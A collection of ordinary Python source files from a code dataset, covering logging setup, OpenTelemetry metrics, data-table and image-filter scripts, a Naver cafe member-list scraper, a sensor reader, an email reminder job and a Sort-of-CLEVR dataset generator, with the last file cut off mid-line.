+{"seq_id":"498525415","text":"import logging\nimport logging.config\nimport os.path\n\nimport yaml\n\nfrom omnibot import settings\n\n\ntry:\n with open(settings.LOG_CONFIG_FILE, \"r\") as fd:\n logging.info('Configuring logger from file')\n logconfig = yaml.safe_load(os.path.expandvars(fd.read()))\n logging.config.dictConfig(logconfig)\nexcept FileNotFoundError:\n logging.warning(\n f'{settings.LOG_CONFIG_FILE} not found; skipping logging configuration'\n )\nexcept Exception:\n logging.exception(\n f'Failed to load {settings.LOG_CONFIG_FILE}; skipping logging configuration'\n )\n","sub_path":"omnibot/setup_logging.py","file_name":"setup_logging.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"622464956","text":"# Copyright The OpenTelemetry Authors\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nfrom logging import getLogger\nfrom threading import Lock\nfrom typing import TYPE_CHECKING, Dict, Iterable\n\nfrom opentelemetry.sdk._metrics.aggregation import (\n _Aggregation,\n _convert_aggregation_temporality,\n _PointVarT,\n)\nfrom opentelemetry.sdk._metrics.measurement import Measurement\nfrom opentelemetry.sdk._metrics.point import AggregationTemporality, Metric\nfrom opentelemetry.sdk._metrics.sdk_configuration import SdkConfiguration\nfrom opentelemetry.sdk._metrics.view import View\n\nif TYPE_CHECKING:\n from opentelemetry.sdk._metrics.instrument import _Instrument\n\n_logger = getLogger(__name__)\n\n\nclass _ViewInstrumentMatch:\n def __init__(\n self,\n view: View,\n instrument: \"_Instrument\",\n sdk_config: SdkConfiguration,\n ):\n self._view = view\n self._instrument = instrument\n self._sdk_config = sdk_config\n self._attributes_aggregation: Dict[frozenset, _Aggregation] = {}\n self._attributes_previous_point: Dict[frozenset, _PointVarT] = {}\n self._lock = Lock()\n\n # pylint: disable=protected-access\n def consume_measurement(self, measurement: Measurement) -> None:\n\n if self._view._attribute_keys is not None:\n\n attributes = {}\n\n for key, value in (measurement.attributes or {}).items():\n if key in self._view._attribute_keys:\n attributes[key] = value\n elif measurement.attributes is not None:\n attributes = measurement.attributes\n else:\n attributes = {}\n\n attributes = frozenset(attributes.items())\n\n if attributes not in self._attributes_aggregation:\n with self._lock:\n if attributes not in self._attributes_aggregation:\n self._attributes_aggregation[\n attributes\n ] = self._view._aggregation._create_aggregation(\n self._instrument\n )\n\n self._attributes_aggregation[attributes].aggregate(measurement)\n\n def collect(self, temporality: int) -> Iterable[Metric]:\n\n with self._lock:\n for (\n attributes,\n aggregation,\n ) in self._attributes_aggregation.items():\n\n previous_point = self._attributes_previous_point.get(\n attributes\n )\n\n current_point = aggregation.collect()\n\n # pylint: disable=assignment-from-none\n self._attributes_previous_point[\n attributes\n ] = _convert_aggregation_temporality(\n previous_point,\n current_point,\n AggregationTemporality.CUMULATIVE,\n )\n\n if current_point is not None:\n\n yield Metric(\n attributes=dict(attributes),\n description=(\n self._view._description\n or self._instrument.description\n ),\n instrumentation_info=self._instrument.instrumentation_info,\n name=self._view._name or self._instrument.name,\n resource=self._sdk_config.resource,\n unit=self._instrument.unit,\n point=_convert_aggregation_temporality(\n previous_point,\n current_point,\n temporality,\n ),\n )\n","sub_path":"opentelemetry-sdk/src/opentelemetry/sdk/_metrics/_view_instrument_match.py","file_name":"_view_instrument_match.py","file_ext":"py","file_size_in_byte":4181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"428818503","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport pandas as pd\nimport fire\n\n\ndef runner(in_filename, out_filename):\n \"\"\"\n This table will be used for comparing the various error estimates in the SI.\n \"\"\"\n experiments = [\"Mass density, kg/m3\", \"Relative permittivity at zero frequency\"]\n #experiments = [\"Relative permittivity at zero frequency\"]\n\n X = pd.read_csv(in_filename)\n\n # Precalculate sigma ** -2 for use in weighted variance calculation\n for e in experiments:\n key0 = e + \"_std\"\n key1 = e + \"_std\" + \"_invsquare\"\n X[key1] = X[key0] ** -2.\n\n data = X.groupby([\"components\", \"smiles\", \"cas\", \"Temperature, K\", \"Pressure, kPa\"])[experiments].mean().dropna()\n counts = X.groupby([\"components\", \"smiles\", \"cas\", \"Temperature, K\", \"Pressure, kPa\"])[experiments].count().ix[data.index]\n\n uncertainty_std = X.groupby([\"components\", \"smiles\", \"cas\", \"Temperature, K\", \"Pressure, kPa\"])[experiments].std().ix[data.index]\n\n # What is the groupwise average (and std) of author-reported uncertainties?\n # Currently, not particularly useful because the std is undefined for most cases due to having only a single author-reported uncertainty\n uncertainty_author_averaged = X.groupby([\"components\", \"smiles\", \"cas\", \"Temperature, K\", \"Pressure, kPa\"])[[e + \"_std\" for e in experiments]].mean().ix[data.index]\n uncertainty_author_median = X.groupby([\"components\", \"smiles\", \"cas\", \"Temperature, K\", \"Pressure, kPa\"])[[e + \"_std\" for e in experiments]].median().ix[data.index]\n uncertainty_author_std = X.groupby([\"components\", \"smiles\", \"cas\", \"Temperature, K\", \"Pressure, kPa\"])[[e + \"_std\" for e in experiments]].std().ix[data.index]\n\n # What is the weighted groupwise std of author-reported uncertainties?\n # V(y) = [\\sum_k \\sigma_k^{-2}]^{-1}\n # std(y) = [\\sum_k \\sigma_k^{-2}]^{-0.5}\n # Use precalculated inverse squared uncertainties\n uncertainty_author = X.groupby([\"components\", \"smiles\", \"cas\", \"Temperature, K\", \"Pressure, kPa\"])[[e + \"_std\" + \"_invsquare\" for e in experiments]].sum().ix[data.index] ** -0.5\n\n\n uncertainty_author_median.columns = uncertainty_std.columns # Strip off the _std from column names for now.\n uncertainty_author.columns = uncertainty_std.columns # Strip off the _std from column names for now.\n uncertainty_author_averaged.columns = uncertainty_std.columns # Strip off the _std from column names for now.\n uncertainty_author_std.columns = uncertainty_std.columns # Strip off the _std from column names for now.\n\n\n # Previously preferred the standard deviation, but now we pick the *larger* error estimate.\n #mask = (uncertainty_std.isnull() & (~uncertainty_author.isnull()))\n #uncertainty_bestguess = uncertainty_std.copy()\n #uncertainty_bestguess[mask] = uncertainty_author[mask]\n\n uncertainty_author_median.replace(np.nan, -np.inf, inplace=True)\n uncertainty_author_averaged.replace(np.nan, -np.inf, inplace=True)\n uncertainty_std.replace(np.nan, -np.inf, inplace=True)\n uncertainty_author.replace(np.nan, -np.inf, inplace=True)\n\n uncertainty_bestguess = uncertainty_std.copy()\n ind = uncertainty_author > uncertainty_std\n uncertainty_bestguess[ind] = uncertainty_author[ind]\n\n uncertainty_author_median.replace(-np.inf, np.nan, inplace=True)\n uncertainty_author_averaged.replace(-np.inf, np.nan, inplace=True)\n uncertainty_std.replace(-np.inf, np.nan, inplace=True)\n uncertainty_author.replace(-np.inf, np.nan, inplace=True)\n uncertainty_bestguess.replace(-np.inf, np.nan, inplace=True)\n\n for e in experiments:\n data[e + \"_uncertainty_std\"] = uncertainty_std[e]\n data[e + \"_uncertainty_author_weighted\"] = uncertainty_author[e]\n data[e + \"_uncertainty_author_averaged\"] = uncertainty_author_averaged[e]\n data[e + \"_uncertainty_author_median\"] = uncertainty_author_median[e]\n data[e + \"_uncertainty_bestguess\"] = uncertainty_bestguess[e]\n data[e + \"_counts\"] = counts[e]\n\n data.to_csv(out_filename)\n\n\nif __name__ == \"__main__\":\n fire.Fire(runner)\n","sub_path":"code/create_data_table_for_si.py","file_name":"create_data_table_for_si.py","file_ext":"py","file_size_in_byte":4078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"321183510","text":"import sys\nimport io\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.keys import Keys\nimport pyperclip\nfrom bs4 import BeautifulSoup\nimport time\n\nsys.stdout = io.TextIOWrapper(sys.stdout.detach(), encoding = 'utf-8')\nsys.stderr = io.TextIOWrapper(sys.stderr.detach(), encoding = 'utf-8')\n\nclass NcafeWriteAtt :\n #초기화 실행(webdriver설정)\n def __init__(self) :\n option = Options()\n # option.add_argument(\"--headless\") #cli\n self.driver = webdriver.Chrome(chrome_options=option, executable_path=r\"D:/dh/Python_atom/section3/webdriver/Chrome/chromedriver\")\n self.driver.implicitly_wait(5)\n\n def getMemberList(self) :\n self.driver.get('https://nid.naver.com/nidlogin.login')\n\n pyperclip.copy('') #아이디입력\n self.driver.find_element_by_name('id').click()\n ActionChains(self.driver).key_down(Keys.CONTROL).send_keys('v').key_up(Keys.CONTROL).perform()\n\n\n pyperclip.copy('') #비밀번호 입력\n self.driver.find_element_by_name('pw').click()\n ActionChains(self.driver).key_down(Keys.CONTROL).send_keys('v').key_up(Keys.CONTROL).perform()\n\n\n\n self.driver.find_element_by_xpath('//*[@id=\"log.login\"]').click()\n time.sleep(15)\n self.driver.implicitly_wait(5)\n self.driver.get('https://cafe.naver.com/CafeMemberViewTab.nhn?defaultSearch.clubid=19756449')\n self.driver.implicitly_wait(5)\n self.driver.switch_to_frame('cafe_main')\n\n\n #--\n # self.driver.implicitly_wait(5)\n # soup = BeautifulSoup(self.driver.page_source, 'html.parser')\n\n\n #--\n self.list = []\n stoppi = 0\n pagep = 2\n run = True\n while run :\n if stoppi > 0 :\n pagep = 3\n try :\n for i in range(10) :\n self.driver.find_element_by_css_selector(\"#main-area > div.prev-next > a:nth-child(\"+str(i+pagep)+\")\").click()\n\n time.sleep(0.05)\n tmpList = self.driver.find_elements_by_css_selector(\"div.ellipsis.m-tcol-c\")\n for j in range(len(tmpList)) :\n self.list.append(tmpList[j].text.strip())\n self.driver.find_element_by_css_selector(\"#main-area > div.prev-next > a.pgR\").click()\n \n except Exception as e :\n print(e)\n run = False\n stoppi += 1\n if stoppi == 5 : #5페이지\n run = False\n\n time.sleep(3)\n return self.list\n\n def __del__(self) :\n self.driver.quit()\n print(\"Removed driver Object\")\n\n#실행 메인\n\nif __name__ == '__main__' :\n #객체 생성\n a = NcafeWriteAtt()\n start_time = time.time()\n list = a.getMemberList()\n\n print(\"---Total %s seconds \" % (time.time()-start_time))\n time.sleep(10)\n members = \"\"\n for i in list :\n print(i)\n members += i+\"\\n\"\n members += \"총\"+str(len(list))+\"명\"\n print(\"총\",len(list),\"명\")\n\n savePath = \"D:/dh/Python_atom_a/memberList.txt\"\n with open(savePath, 'wt') as saveFile :\n saveFile.write(members)\n\n del a\n","sub_path":"section3/3-7-2.py","file_name":"3-7-2.py","file_ext":"py","file_size_in_byte":3304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"87947346","text":"import time\nimport machine\nimport onewire, ds18x20\n\n# the device is on GPIO12\ndat = machine.Pin(4)\n\n# create the onewire object\nds = ds18x20.DS18X20(onewire.OneWire(dat))\n\n# scan for devices on the bus\nroms = ds.scan()\nprint('found devices:', roms)\n\ndef get_temps():\n ds.convert_temp()\n time.sleep_ms(750)\n\n temps = []\n for rom in roms:\n temp = ds.read_temp(rom)\n temp = (temp * 9 / 5) + 32\n temps.append(temp)\n return temps\n","sub_path":"esp8266/temp_sense.py","file_name":"temp_sense.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"269444274","text":"import json\nimport os\nimport datetime\n\nfrom utl.notifier import Notifier\nfrom utl.database.models import models\nfrom utl.database.functions.models.users import getAllUsersInfo\nfrom utl.database.functions.models.savedOpportunities import getSavedOpportunities, removeOpportunityReminder\nfrom utl.database.functions.models.savedScholarships import getSavedScholarships, removeScholarshipReminder\nfrom __init__ import app\n\ndb = models.db\n\nDIR = os.path.dirname(__file__) or \".\"\nDIR += \"/\"\npath = DIR + \"../gmail.json\"\n\nf = open(path)\nf = json.load(f)\n\nuser = f['gmail']\npwd = f['password']\n\nbaseurl = \"http://127.0.0.1:5000\"\n\n\ndef findReminderIso(date):\n return (date - datetime.timedelta(days=7)).date().isoformat()\n\n\ndef constructSection(html, l, name):\n if len(l) > 0:\n html += f\"

Here are all of your favorited {name} that have deadlines next week:

\"\n for obj in l:\n id = obj.opportunityID if name == 'opportunities' else obj.scholarshipID\n html += f\"{obj.title}
\"\n return html\n\n\ndef constructBody(opportunities, scholarships, time):\n html = \"\"\n html = constructSection(html, opportunities, 'opportunities')\n html = constructSection(html, scholarships, 'scholarships')\n html += \"
--
Caerus\"\n return html\n\n\nif __name__ == \"__main__\":\n db.init_app(app)\n with app.app_context():\n db.create_all()\n notifier = Notifier(user, pwd)\n users = getAllUsersInfo()\n for user in users:\n\n time = datetime.datetime.now()\n iso = time.date().isoformat()\n\n savedOpps = getSavedOpportunities(user.userID)\n savedScholars = getSavedScholarships(user.userID)\n\n savedOpps = [opp for opp in savedOpps if opp.deadline != None]\n savedScholars = [s for s in savedScholars if s.deadline != None]\n\n savedOpps = [\n opp for opp in savedOpps\n if findReminderIso(opp.deadline) == iso\n ]\n savedScholars = [\n s for s in savedScholars\n if findReminderIso(s.deadline) == iso]\n\n if len(savedOpps) > 0 or len(savedScholars) > 0:\n html = constructBody(savedOpps, savedScholars, time)\n\n notifier.sendmail(\n [user.email], f\"Caerus Reminder -- {iso}\", html\n )\n print(\n f\"Reminder email sent to {user.email} -- {time.isoformat()}\")\n","sub_path":"app/reminder.notify.py","file_name":"reminder.notify.py","file_ext":"py","file_size_in_byte":2526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"648777971","text":"# url = 'https://www.acmicpc.net/problem/13460'\n\nN, M = map(int, input().split())\narr = [list(input()) for _ in range(N)]\nfor y in range(N):\n for x in range(M):\n if arr[y][x] == 'R':\n red = (x, y)\n elif arr[y][x] == 'B':\n blue = (x, y)\n\ndef find(cnt, rx, ry, bx, by):\n for i in range(4):\n nx, ny = rx+dx[i], ry+dy[i]\n if arr[ny][nx] == '#':\n continue\n if (nx, ny) == (bx, by):\n if arr[by+dy[i]][bx+dx[i]] == '#':\n continue\n q.append((cnt, i, (rx, ry), (bx, by)))\n\n\ndx, dy = (0, 1, 0, -1), (-1, 0, 1, 0)\n\nq = []\nfind(0, red[0], red[1], blue[0], blue[1])\nprint(q)\nwhile q:\n cnt, d, red, blue = q.pop(0)","sub_path":"Samsung/13460. 구슬 탈출 2.py","file_name":"13460. 구슬 탈출 2.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"393345554","text":"from datetime import datetime\nimport logging\nimport src.my_sql as my_sql\n\nmodule_logger = logging.getLogger('main.budget')\n\nclass Budget():\n __singleton = None\n __start_year = 2018\n __end_year = 2050\n\n def __new__(cls, *args, **kwargs):\n \"\"\"\n Singleton: Just one instance of Budget is possible at a time\n \"\"\"\n\n if not cls.__singleton:\n cls.__singleton = super().__new__(Budget)\n return cls.__singleton\n\n\n def __init__(self, id=1, year=datetime.now().year ,comment='Some text'):\n \"\"\"\n Initialize main parameters\n \"\"\"\n self.logger = logging.getLogger('main.budget.Budget')\n self.id = id\n\n try:\n self.year = int(year)\n except Exception:\n self.year = Budget.__start_year\n self.logger.warning('\\n Can not be casted to int: {} --> {}'.format(repr(year), self.year))\n finally:\n if self.year not in range(Budget.__start_year, Budget.__end_year):\n self.year = Budget.__start_year\n self.logger.warning('\\n Out of range: {} --> {}'.format(repr(year), self.year))\n\n self.comment = comment\n\n def get_id(self):\n return self.id\n\n\n @classmethod\n def create_table_budget( cls, my_db, table_name ):\n \"\"\"Create new 'budget' table\"\"\"\n cls.my_db = my_db\n cls.table_name = table_name\n my_db.create_table( my_sql.create_table_budget(cls.table_name) )\n\n\n\n\nif __name__ == '__main__':\n pass\n\n","sub_path":"src/budget.py","file_name":"budget.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"267084487","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndef jbf(image_D, image_C, w, sigma_f, sigma_g):\r\n\r\n res_image = image_D.copy()\r\n distance = np.zeros([w, w], dtype=np.float)\r\n # 算出滤波窗口内的距离\r\n for m in range(w):\r\n for n in range(w):\r\n distance[m, n] = (m - w//2) ** 2 + (n - w//2) ** 2\r\n\r\n for i in range(w//2, image_C.shape[0] - w//2):\r\n for j in range(w//2, image_C.shape[1] - w//2):\r\n for d in range(3):\r\n # 计算当前窗口范围\r\n istart = i - w//2\r\n iend = i + w//2\r\n jstart = j - w//2\r\n jend = j + w//2\r\n # 原图的当前窗口\r\n window_s = image_D[istart:iend + 1, jstart: jend + 1, d]\r\n # 引导图的当前窗口\r\n window_g = image_C[istart:iend + 1, jstart: jend + 1, d]\r\n # 由引导图像的灰度值差计算值域核\r\n f = np.exp(-0.5 * distance / (sigma_f ** 2))\r\n g = np.exp(-0.5 * (window_g - image_C[i, j, d]) ** 2 / (sigma_g ** 2))\r\n # 根据公式给出\r\n res_image[i, j, d] = np.sum(g * f * window_s) / np.sum(g * f)\r\n # print(res_image)\r\n return res_image\r\n\r\n\r\ndef bilinear(img, rate):\r\n # 双线性插值\r\n x, y = int(img.shape[0]*rate), int(img.shape[1]*rate)\r\n res_img = np.zeros((x, y, 4), dtype=np.float)\r\n for i in range(x):\r\n for j in range(y):\r\n temp_x = int(i / rate)\r\n temp_y = int(j / rate)\r\n u = i / rate - temp_x\r\n v = j / rate - temp_y\r\n # 防止边缘越界\r\n m1 = min(temp_x + 1, img.shape[0] - 1)\r\n n1 = min(temp_y + 1, img.shape[1] - 1)\r\n # 双线性插值的式子\r\n res_img[i, j, :] = img[temp_x, temp_y, :] * (1 - u) * (1 - v) + img[m1, n1, :] * (1-u) * v + img[m1, temp_y, :] * u * (1-v) + img[temp_x, n1, :] * u * v\r\n return res_img\r\n\r\n\r\n#得到引导图像\r\nimage_path1 = './images/pro_2/b.png'\r\nplt.subplot(1, 3, 1)\r\nsource_img = plt.imread(image_path1)\r\nplt.imshow(source_img)\r\nplt.subplot(1, 3, 2)\r\nimg = bilinear(source_img, 1/2)\r\nimg_2 = bilinear(img, 2)\r\nplt.imshow(img_2)\r\n# 进行联合双边滤波\r\nplt.subplot(1, 3, 3)\r\nres_image = jbf(source_img, img_2, 9, 11, 3)\r\nplt.imshow(res_image)\r\nplt.show()\r\n","sub_path":"experiment_2_2.py","file_name":"experiment_2_2.py","file_ext":"py","file_size_in_byte":2373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"588050404","text":"from typing import Dict, List, Tuple\nimport torch \nfrom torch.utils.data import Dataset \nimport os\nimport pickle \nimport numpy as np\nimport random\nimport cv2\nfrom PIL import Image \nfrom tqdm import tqdm\n\n\ndef generate_dataset(root,\n dataset_size=10000,\n img_size=75,\n object_size=5,\n nb_objects=6\n ):\n '''\n Inspired by: https://github.com/kimhc6028/relational-networks/blob/master/sort_of_clevr_generator.py\n '''\n \n '''\n question_size = 11 ##6 for one-hot vector of color, 2 for question type, 3 for question subtype\n \"\"\"Answer : [yes, no, rectangle, circle, r, g, b, o, k, y]\"\"\"\n '''\n question_size = nb_objects+5 \n ## nb_objects(==nb_colors) for one-hot vector of color, 2 for question type, 3 for question subtype\n \"\"\"Answer : [yes, no, rectangle, circle, *colors]\"\"\"\n \n dirs = root \n \n colors = [\n (0,0,255),##r\n (0,255,0),##g\n (255,0,0),##b\n (0,156,255),##o\n (128,128,128),##k\n (0,255,255)##y\n ]\n assert(nb_objects<=6)\n colors = colors[:nb_objects]\n \n shapes = [\n \"circle\",\n \"rectangle\"\n ]\n \n '''\n # 0, as a class, is a lack of object (no color/ no shape):\n latent_one_hot_repr_sizes = {\"color\":len(colors)+1,\n \"shape\":len(shapes)+1,\n }\n\n size_one_hot_vec_per_object = sum([v for k,v in latent_one_hot_repr_sizes.items()])\n nb_attr_per_object = len(latent_one_hot_repr_sizes)\n '''\n\n pos_X = np.arange(object_size, img_size-object_size+1, 2*object_size)\n pos_Y = np.arange(object_size, img_size-object_size+1, 2*object_size)\n nb_colors = len(colors)\n nb_shapes = len(shapes)\n nX = len(pos_X)\n nY = len(pos_Y)\n latent_one_hot_repr_sizes = {\n \"color\":nb_colors, #similar to id\n \"shape\":nb_shapes,\n \"pos_X\":nX,\n \"pos_Y\":nY,\n }\n\n one_object_latents_ones_hot_size = sum([v for k,v in latent_one_hot_repr_sizes.items()])\n \n possible_Y_values = pos_Y \n possible_X_values = pos_X \n possible_shape_values = np.arange(0,len(shapes))\n possible_color_values = np.arange(0,len(colors))\n possible_object_id_values = np.arange(0,nb_objects)\n\n dummy_latent_values = np.zeros(4).astype(int)\n dummy_latent_class = np.zeros(4).astype(int)\n # (4, )\n dummy_latent_one_hot = np.zeros(one_object_latents_ones_hot_size).astype(int)\n\n def generate_obj_latents(obj):\n '''\n :param obj: (color_id, (cx, cy) , shape_str, bx, by)\n '''\n color_id = obj[0]\n shape_id = 0 if obj[2] == 'r' else 1\n xid = obj[-2]\n posx = obj[1][0]\n yid = obj[-1]\n posy = obj[1][1]\n\n obj_latent_class = dummy_latent_class.copy()\n obj_latent_values = dummy_latent_values.copy()\n obj_latent_one_hot = dummy_latent_one_hot.copy()\n\n one_hot_idx_start = 0\n\n # Color:\n obj_latent_class[0] = color_id\n obj_latent_values[0] = color_id\n obj_latent_one_hot[one_hot_idx_start+color_id] = 1\n\n # Shape:\n obj_latent_class[1] = shape_id\n obj_latent_values[1] = shape_id\n one_hot_idx_start_shape = one_hot_idx_start+nb_colors\n obj_latent_one_hot[one_hot_idx_start_shape+shape_id] = 1\n\n # X:\n obj_latent_class[2] = xid \n obj_latent_values[2] = posx \n one_hot_idx_start_px = one_hot_idx_start_shape+nb_shapes\n obj_latent_one_hot[one_hot_idx_start_px+xid] = 1\n \n # Y:\n obj_latent_class[3] = yid \n obj_latent_values[3] = posy \n one_hot_idx_start_py = one_hot_idx_start_px+nX\n obj_latent_one_hot[one_hot_idx_start_py+yid] = 1\n \n return obj_latent_class, obj_latent_values, obj_latent_one_hot\n\n def find_pos_side_bucket(coord, pos_side):\n return max(0, coord-1) // (2*object_size)\n\n def generate_center_coord(objects):\n while True:\n pas = True\n center = np.random.randint(0+object_size, img_size - object_size, 2) \n if len(objects) > 0:\n for obj in objects:\n name,c,shape = obj[:3]\n if ((center - c) ** 2).sum() < ((object_size * 2) ** 2):\n pas = False\n if pas:\n return center\n\n def generate_datapoint():\n objects = []\n img = np.ones((img_size,img_size,3)) * 255\n for color_id,color in enumerate(colors[:nb_objects]): \n center = generate_center_coord(objects)\n bx = find_pos_side_bucket(center[0], pos_X)\n by = find_pos_side_bucket(center[1], pos_Y)\n if random.random()<0.5:\n start = (center[0]-object_size, center[1]-object_size)\n end = (center[0]+object_size, center[1]+object_size)\n cv2.rectangle(img, start, end, color, -1)\n objects.append((color_id,center,'r',bx,by))\n else:\n center_ = (center[0], center[1])\n cv2.circle(img, center_, object_size, color, -1)\n objects.append((color_id,center,'c',bx,by))\n\n # building latents:\n per_obj_latents = [ generate_obj_latents(obj) for obj in objects]\n img_latent_class, img_latent_values, img_latent_one_hot = [*zip(*per_obj_latents)]\n \n img_latent_class = np.concatenate(img_latent_class, axis=0)\n img_latent_values = np.concatenate(img_latent_values, axis=0)\n img_latent_one_hot = np.concatenate(img_latent_one_hot, axis=0)\n \n objects = [ obj_latent for obj_latent in img_latent_values.reshape((-1,4))]\n \n rel_questions = {st:[] for st in range(3)}\n norel_questions = {st:[] for st in range(3)}\n rel_answers = {st:[] for st in range(3)}\n norel_answers = {st:[] for st in range(3)}\n\n original_question = np.zeros((question_size))\n\n \"\"\"Non-relational questions\"\"\"\n for subtype_id in range(3):\n for color_object_id in range(len(colors)):\n question = original_question.copy()\n # What color is the object we are considering, \n # i.e. which object are we considering? \n question[color_object_id] = 1\n # non-relational question\n question[nb_objects] = 1\n # subtype :\n question[nb_objects+2+subtype_id] = 1\n \"\"\"\n Answer : [yes, no, 1~nb_objects(shapes), 1~nb_objects(count)]\n \"\"\"\n if subtype_id == 0:\n \"\"\"query shape->1~nb_shape\"\"\"\n # Account for yes/no :\n answer_idx = 2+objects[color_object_id][1] \n #from idx 0 to nb_shape-1\n elif subtype_id == 1:\n \"\"\"query horizontal (X) position->yes/no\"\"\"\n if objects[color_object_id][2] < img_size / 2:\n answer_idx = 0\n # yes\n else:\n answer_idx = 1\n # no\n elif subtype_id == 2:\n \"\"\"query vertical (Y) position->yes/no\"\"\"\n if objects[color_object_id][3] < img_size / 2:\n answer_idx = 0\n # yes\n else:\n answer_idx = 1\n # no\n norel_questions[subtype_id].append(question)\n norel_answers[subtype_id].append(answer_idx)\n \n \"\"\"Relational questions\"\"\"\n for subtype_id in range(3):\n for color_object_id in range(len(colors)):\n question = original_question.copy()\n # What color is the object we are considering, \n # i.e. what object are we considering? \n question[color_object_id] = 1\n # relational question\n question[nb_objects+1] = 1\n # subtype :\n question[nb_objects+2+subtype_id] = 1\n \"\"\"\n Answer : [yes, no, 1~nb_shapes, 1~nb_objects(count)]\n \"\"\"\n if subtype_id == 0:\n \"\"\"\n closest-to->1~nb_shapes\n \"\"\"\n my_obj_pos = np.asarray([objects[color_object_id][2],objects[color_object_id][3]])\n dist_list = [((my_obj_pos - np.asarray([obj[2],obj[3]])) ** 2).sum() \n for idx, obj in enumerate(objects)]\n # We make sure that we are not going to sample the object we are considering:\n dist_list[dist_list.index(0)] = 999\n closest_id_in_dist_list = dist_list.index(min(dist_list))\n closest = objects[closest_id_in_dist_list][0]\n closest_shape_id = objects[closest][1]\n answer_idx = 2+closest_shape_id\n elif subtype_id == 1:\n \"\"\"\n furthest-from->1~nb_shapes\n \"\"\"\n my_obj_pos = np.asarray([objects[color_object_id][2],objects[color_object_id][3]])\n dist_list = [((my_obj_pos - np.asarray([obj[2],obj[3]])) ** 2).sum() \n for idx,obj in enumerate(objects)]\n furthest_id_in_dist_list = dist_list.index(max(dist_list))\n furthest = objects[furthest_id_in_dist_list][0]\n furthest_shape_id = objects[furthest][1]\n answer_idx = 2+furthest_shape_id\n elif subtype_id == 2:\n \"\"\"\n count-same-shape->1~nb_objects(count)\n \"\"\"\n my_obj_shape_id = objects[color_object_id][1]\n count = -1\n for obj_id, obj in enumerate(objects):\n if obj[1] == my_obj_shape_id:\n count +=1 \n answer_idx = 2+nb_shapes+count\n # from idx 2+nb_objects (i.e. count=0, \n # which is actually 1 object of the given shape, \n # obtained when checking that very object from \n # the list of objects ...)\n # to idx 2+nb_objects + (nb_objects-1) = 3 + nb_objects\n # (i.e. count=nb_objects-1,\n # which is actually nb_objects objects of the given shape).\n\n rel_questions[subtype_id].append(question)\n rel_answers[subtype_id].append(answer_idx)\n\n # Dict of keys 0,1,2 (subtypes) and values are list of questions (one_hot_vec):\n norelations = (norel_questions, norel_answers)\n relations = (rel_questions, rel_answers)\n \n #img = (img/255.).transpose((2,0,1))\n img = (img).astype('uint8').transpose((2,1,0))\n\n datapoint = (img, \n relations, \n norelations, \n img_latent_class.reshape(-1), \n img_latent_values.reshape(-1),\n img_latent_one_hot.reshape(-1))\n \n return datapoint\n\n print('building test datasets...')\n dataset = {\n \"imgs\":[],\n \"latents_values\":[],\n \"latents_classes\":[],\n \"latents_one_hot\":[],\n \"relational_qs_0\":[],\n \"relational_qs_1\":[],\n \"relational_qs_2\":[],\n \"non_relational_qs_0\":[],\n \"non_relational_qs_1\":[],\n \"non_relational_qs_2\":[],\n \"relational_as_0\":[],\n \"relational_as_1\":[],\n \"relational_as_2\":[],\n \"non_relational_as_0\":[],\n \"non_relational_as_1\":[],\n \"non_relational_as_2\":[],\n }\n\n pbar = tqdm(total=dataset_size)\n for _ in range(dataset_size):\n pbar.update(1)\n\n datapoint = generate_datapoint()\n #(img, relations, norelations, latent_class, latent_values, latent_one_hot)\n dataset['imgs'].append(datapoint[0])\n dataset['latents_classes'].append(datapoint[-3])\n dataset['latents_values'].append(datapoint[-2])\n dataset['latents_one_hot'].append(datapoint[-1])\n \n dataset['relational_qs_0'].append(np.stack(datapoint[1][0][0]))\n dataset['relational_qs_1'].append(np.stack(datapoint[1][0][1]))\n dataset['relational_qs_2'].append(np.stack(datapoint[1][0][2]))\n dataset['non_relational_qs_0'].append(np.stack(datapoint[2][0][0]))\n dataset['non_relational_qs_1'].append(np.stack(datapoint[2][0][1]))\n dataset['non_relational_qs_2'].append(np.stack(datapoint[2][0][2]))\n \n dataset['relational_as_0'].append(np.asarray(datapoint[1][1][0]))\n dataset['relational_as_1'].append(np.asarray(datapoint[1][1][1]))\n dataset['relational_as_2'].append(np.asarray(datapoint[1][1][2]))\n dataset['non_relational_as_0'].append(np.asarray(datapoint[2][1][0]))\n dataset['non_relational_as_1'].append(np.asarray(datapoint[2][1][1]))\n dataset['non_relational_as_2'].append(np.asarray(datapoint[2][1][2]))\n\n print('saving dataset...')\n filename = os.path.join(dirs,'sort-of-clevr.pickle')\n with open(filename, 'wb') as f:\n pickle.dump(dataset, f)\n print('dataset saved at {}'.format(filename))\n\n return dataset\n\n\nclass SortOfCLEVRDataset(Dataset):\n def __init__(self, \n root, \n train=True, \n transform=None, \n generate=False,\n dataset_size=10000,\n test_size=2000,\n img_size=75,\n object_size=5,\n nb_objects=6,\n test_id_analogy=False,\n test_id_analogy_threshold=3,\n ):\n super(SortOfCLEVRDataset, self).__init__()\n \n self.root = root\n self.file = 